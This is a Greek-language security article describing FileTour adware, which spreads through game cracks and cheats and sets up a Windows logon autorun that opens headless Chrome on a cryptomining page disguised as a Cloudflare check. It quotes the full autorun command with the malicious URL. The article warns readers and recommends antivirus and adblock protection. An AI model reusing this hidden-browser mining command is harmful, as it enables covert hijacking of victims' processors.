To FileTour είναι ένα adware που εξαπλώνεται μέσω διαφόρων cracks και cheats για παιχνίδια και άλλα προγράμματα. Όταν εγκατασταθεί, δημιουργείται ένα autorun το οποίο εκτελείται μόλις πραγματοποιηθεί σύνδεση ενός χρήστη στα Windows. Το autorun περιέχει την εξής εντολή:
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” –headless –disable-gpu –remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41.html?t=0.4
Αυτή η εντολή τρέχει ένα παράθυρο του Chrome χωρίς γραφικό περιβάλλον -πρακτικά αόρατο- και συνδέεται αυτόματα στον παραπάνω σύνδεσμο.
Όταν ο περιηγητής ανοίξει την σελίδα εκτελεί τον ενσωματωμένο κώδικα, που πρόκειται στην ουσία για ένα miner κρυπτονομισμάτων. Όσο ο κώδικας εκτελείται η χρήση του επεξεργαστή ανεβαίνει έως και 70-80% ακόμα και αν το παράθυρο είναι “αόρατο”.
Όπως καταλαβαίνουμε, με την χρήση ενός “αόρατου” προγράμματος, πολλοί δεν θα αντιληφθούν ότι το σύστημά τους έχει επηρεαστεί. Παρόλο που το σύστημα θα φαίνεται πιο αργό απ’ ότι συνήθως και κάποιοι ίσως ελέγξουν στον Task manager τις διεργασίες που τρέχουν, οι περισσότεροι χρήστες θα συνεχίσουν να λειτουργούν το πρόγραμμα για αρκετές ημέρες χωρίς να υποψιαστούν κάτι.
Ενώ πολλοί δεν θα δώσουν καμία σημασία στην συγκεκριμένη σελίδα στο browser, εμείς ρίξαμε μια ματιά. Αυτό που διαπιστώσαμε είναι ότι η εν λόγω σελίδα προσποιείται πως είναι η γνωστή εταιρία Cloudflare που μεταξύ άλλων παρέχει anti-DDos υπηρεσίες πιστοποιώντας αν ο επισκέπτης είναι άνθρωπος η ρομπότ.
Παρόλο που η σελίδα μοιάζει με την αληθινή υπηρεσία του Clouflare, το checkbox δεν δουλεύει. Πέρα από αυτό ο πηγαίος κώδικας της σελίδας δείχνει ξεκάθαρα το mining script του FileTour να φορτώνεται στην σελίδα, κάτι που το Clouflare δεν θα έκανε.
Η μη εξουσιοδοτημένη εξόρυξη κρυπτονομισμάτων αποτελεί πλέον σοβαρό πρόβλημα, και οδεύει προς το χειρότερο. Για αυτόν τον λόγο συνίσταται η χρήση κάποιου antivirus που ανιχνεύει εάν κάποιος περιηγητής συνδέεται σε γνωστές υπηρεσίες εξόρυξης. Αυτό βέβαια δεν μπορεί να μας εξασφαλίσει 100% ασφάλεια καθώς νέες υπηρεσίες εμφανίζονται μέρα με την μέρα.
Για περαιτέρω ασφάλεια συνίσταται η χρήση κάποιου πρόσθετου adblock το οποίο θα μπλοκάρει όλες τις υπηρεσίες τέτοιου τύπου εντός του περιηγητή.
